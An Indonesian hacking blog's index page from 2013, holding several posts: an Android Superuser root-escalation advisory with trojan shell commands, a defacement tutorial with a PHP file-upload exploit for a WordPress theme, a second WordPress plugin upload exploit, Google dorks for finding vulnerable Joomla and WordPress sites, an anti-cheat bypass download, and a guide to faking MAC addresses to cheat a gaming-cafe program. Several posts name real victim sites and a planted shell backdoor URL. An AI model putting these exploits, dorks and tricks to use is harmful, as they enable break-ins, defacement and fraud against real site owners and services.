latest articles

Sabtu, 16 November 2013

Android 4.3 Superuser Root Privilege Escalation Vulnerability

Current releases of the CyanogenMod/ClockWorkMod/Koush Superuser
package may allow restricted local users to execute arbitrary commands
as root in certain, non-default device configurations.

Android 4.3 introduced the concept of "restricted profiles," created
through the Settings -> Users menu.  A restricted profile can be
configured to allow access to only a minimal set of applications, and
has extremely limited abilities to change settings on the device.
This is often used to enforce parental controls, or to protect shared
devices set up in public places.  The OS requires an unlock code to be
entered in order to access the owner's profile to administer the
system.

/system/xbin/su is a setuid root executable, and any user may invoke
it in client mode ("su -c 'foo'" or just "su"), or in daemon mode ("su
--daemon").  In either mode of operation, the user who invokes this
program has the ability to manipulate its environment variables, file
descriptors, signals, rlimits, tty/stdin/stdout/stderr, and possibly
other items.  By adding new entries at the front of the PATH for
commonly-executed root commands, then re-invoking "su --daemon", an
attacker may be able to hijack legitimate root sessions subsequently
started by other applications on the device.

"su --daemon" is normally started up very early in the boot process,
as root, from /init.superuser.rc (CM) or from
/system/etc/install-recovery.sh (other ROMs).  The fact that
unprivileged users are allowed to restart the daemon later, under EUID
0, appears to be an oversight.


Successful exploitation requires a number of conditions to be met:

 - The attacker must have ADB shell access, e.g. over USB.  This is
disabled by default, and normally restricted to trusted ADB clients
whose RSA key fingerprints have been accepted by the device
administrator.  Root access via ADB (i.e. Settings -> Developer
Options -> Root access -> Apps and ADB) is not required.  Note that
ADB shell access is typically considered a security risk, even in the
absence of this problem.

 - The attacker must have a way to assume a non-shell (non-2000),
suid-capable Linux UID in order to prevent /system/xbin/su from
creating infinitely recursive connections to itself through the daemon
client UID check in main().  One way to do this would involve
uploading an app with the "debuggable" flag and using
/system/bin/run-as to assume this UID.  "adb install" can probably
used for this purpose.  However, due to a bug in Android 4.3's
"run-as" implementation[1], this does not currently work.  This bug
was fixed in Android 4.4, so CM11 will probably be able to satisfy
this requirement.

 - The device owner must have granted root permissions to one or more
applications via Superuser.  The restricted profile does not need to
be able to run this app from the launcher.

Sample exploit:

The restricted local user can reboot the tablet, run "adb shell" when
the boot animation shows up, then invoke the following commands:

    echo -e '#!/system/bin/sh\nexport PATH=/system/bin:$PATH\ntouch
/data/trojan.out\nexec $0 "$@"' > /data/local/tmp/trojan
    chmod 755 /data/local/tmp/trojan
    for x in id ls cp cat touch chmod chown iptables dmesg; do ln -s
trojan /data/local/tmp/$x ; done
    PATH=/data/local/tmp:$PATH setsid run-as.422 my.debuggable.package
/system/xbin/su --daemon &

(Note the use of "run-as.422" as a proxy for a working Android 4.3
run-as binary, and the installation of "my.debuggable.package" with
the debuggable flag set.)

At this point the USB cable may be disconnected.

The next time a root application successfully passes the Superuser
check and invokes one of the trojaned shell commands,
/data/local/tmp/trojan will be executed under UID 0.

An ideal candidate for exploitation is a package which runs privileged
commands on boot, e.g. AdBlock Plus or AFWall+, as this allows for
instant access.  Another possibility is to hijack an app which the
device's operator runs frequently, such as Titanium Backup.

Note that this can NOT be exploited by malicious applications, as
zygote-spawned processes (apps) always access /system in nosuid
mode[2] on Android 4.3+.  The ADB shell was used as the attack vector
as it is not subject to this restriction.

ChainsDD Superuser v3.1.3 does not have an Android 4.3+ client/server
mode at all, and SuperSU aborts if an existing "daemonsu" instance is
already bound to the abstract @"eu.chainfire.supersu" socket.

Proposed resolution: on Android 4.3 and higher, install all
Superuser-related binaries with mode 0755 (setuid bit unset).

This problem is being tracked under CVE-2013-6770.

[1] https://code.google.com/p/android/issues/detail?id=58373
[2] http://source.android.com/devices/tech/security/enhancements43.html

# 8EBBA150D09BF9B6   1337day.com [2013-11-16]   FD9102EF41DBEC1C #
Read more

Rabu, 13 November 2013

Belkin NetCam Wifi Camera Hardcoded Credentials

Product: Product NetCam WiFi Camera With Night Vision, purchased August 2013 Summary: Live video stream is accessible with user/password of admin/admin. The user/password combination admin/admin cannot be changed by the user. This "feature" is undocumented. To reproduce: 1. Connect webcam to Ethernet or WiFi 2. Access webcam's IP address through a browser, e.g. http://1.2.3.4/ 3. Enter admin/admin as user/password. This will produce an empty page with a copyright notice of "Go Ahead Software Inc., 1994-2000" as an HTML comment 4. Access relative URL /goform/video, e.g. http://1.2.3.4/goform/video to see M-JPEG live video from the camera Status: * Reported to Belkin August 6th. * To the best of my knowledge, Belkin: * has not notified existing users of the product of the vulnerability * has not recalled products * is not actively encouraging users to upgrade their firmware * has "improved" the firmware in unspecified ways since the initial report. (direct communication) * has not published details or release notes of the "firmware improvements", or stated whether and when the new version started shipping on NetCams. The PDF user manual on the Belkin site as of today still references firmware version 2.3.0.

Read more

Senin, 04 November 2013

Cara deface dengan Teknik WordPress Ghost theme File Upload

kali ini saya akan share tutorial Deface dengan Teknik Wordpress Ghost Theme File Upload ,
Exploit Aslinya Disini http://1337day.com/exploit/21416


Cara deface kali ini membutuhkan bantuan XAMPP

Download XAMPP : DISINI

Google Dork : inurl:wp-content/themes/Ghost/

Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini

Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )




Sekarang Copy Exploitnya


<?php
$uploadfile="yourFile.php";
$ch = curl_init("http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Lalu yourFile.php diganti dengan nama shell backdoor kalian yang sudah di masukan ke dalam folder xampp>php

Disini nama shell saya 007.php

dan juga masukin target nya dengan mencari mengunakan dork yang tadi

disini saya mendapat target http://www.hibra.com.ar/

sekarang kita hanya perlu menambahkan

/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php


Dan bila ada tulisan {"status":"NOK", "ERR":"This file is incorect"}

itu biasa nya VULN

setelah itu simpan...disini saya simpan dengan nama x.php

sekarang kita buka CMD

buka exploit tersebut mengunakan CMD

 karna saya simpan dengan nama x.php jadi untuk membuka nya php x.php



Bila muncul seperti ini berarti berhasil

Untuk shell Acces berada disini http://site.com/wp-content/uploads/settingsimages/namashell.php

Karna nama shell saya 007 jadi membuka shell nya http://www.hibra.com.ar/wp-content/uploads/settingsimages/007.php 


semoga bermanfaat :D 

Selamat Malam
Read more

Kamis, 31 Oktober 2013

Bypass Hackshield Kagezone RF Online

Malam semua...sini saya mau membagi sedikit file saya yang tersisa :))



Download?? here

Jangan disebarluaskan :D kata temen masih dikit yang punya 
Read more

Senin, 28 Oktober 2013

Cara Bermain PB di Server GWarnet tanpa harus ke Premium Warnet

Saat agan agan bermain Point Blank Indonesia pasti ada sebagian dari kita yang ingin masuk dan main di server khusus G-Warnet atau Premium Warnet, tapi malas ke warnet yang terdaftar di G-Warnet.  Nah,  disini saya akan memberikan sedikit tips bagaimana caranya agar agan-agan yang bermain Game Point Blank dirumah atau dimana saja, bisa mengakses server GWarnet tanpa harus ke Warnet Premium.

Kelebihan Bermain PB di Server Gwarnet :
- Mendapatkan Exp Up
- Mendapatkan Point Up
- Katanya Server Gwarnet aman, karena gak ada cheater. [Katanya]
jadi buat agan-agan yang ingin test skill murni cocok masuk ke server ini. :D

Oke, Supaya gak ngabisin waktu langsung aja ikuti langkah-langkah untuk bisa bermain PB [ Point Blank ] di server G-Warnet dari rumah tanpa harus ke Warnet Premium :


1.  Buat account Gwarnet, dan ikuti cara registrasi nya di www.gwarnet.com


2.  Pilih Gwarnet Premium [Jangan Pilih yang "GOLD"].
3.  Download Formulir yang disediakan Lalu di Print.



4.  Isi Form yang kita Print tadi dengan lengkap.
5.  Minimal PC / Komputer yang didaftarkan adalah 5 PC, Jadi kita isi Form bagian Physical Addres atau  MAC Addressnya hanya 1 aja yang benar [Komputer kita yang dirumah yang kita pakai] dan  4 Physical Addres  / PC MAC Address lainnya kita isi asal-asalan aja, terserah agan mau ketik angka / huruf apa [12 karakter, contoh seperti gambar di bawah].
6.  Jangan lupa sertakan materai Rp.6000 dan di Tanda Tangani.



7. Lalu Form tadi kita Scan dengan Scaner / Di foto juga bisa yang penting harus kelihatan jelas isinya kemudian kirim ke e-Mail : approve@taiga.co.id

NB :
- Cara Melihat Physical Addres / MAC Address dan IP Komputer kita :
1. Buka Connection Properti.
[biasanya ada di pojok kanan bawah taksbar dekstop, gambar monitor kedip-kedip untuk yang pake jaringan LAN/kabel atau gambar garis-garis sinyal untuk yang pake wi-fi]



2. Klik / Buka Detail



atau agan agan bisa baca-baca di http://www.gwarnet.com/index.php

Sumber: Justleecher.blogspot.com
Read more

Dork Exploit Joomla com_user

intext:Joomla! [Versi Nya] site:.[terserah maunya gimana].

intext:Joomla! [VersiNya] - Open Source Content Management site:.[Suka - Suka Kalian].

inurl:index.php+intext:Joomla! [Versinya] site:.[asal bukan site ID] -_-


Selamat mendeface :*
Read more

Wordpress plugins wp-mailinglist Arbitrary File Upload

#######################################################
# Exploit Title:Wordpress plugins wp-mailinglist Arbitrary File Upload
# Google Dork: "inurl:/wp-content/plugins/wp-mailinglist/"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
# File Type : Txt
# Author 2 : MrTieDie
# Tested on : Windows 7, Php Xampp
#######################################################
#exploit

<?php

$uf="your_file.txt";
$c = curl_init("http://target.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uf",
'folder'=>'/'));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($c);
curl_close($c);

print "$postResult";
?>


File path http://target.com/wp-content/uploads/wp-mailinglist/uploadify/random_name.txt

Demo sites
http://www.freresdeshommes.org/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.whitelodge.com.sg//wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.prairieswine.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
Read more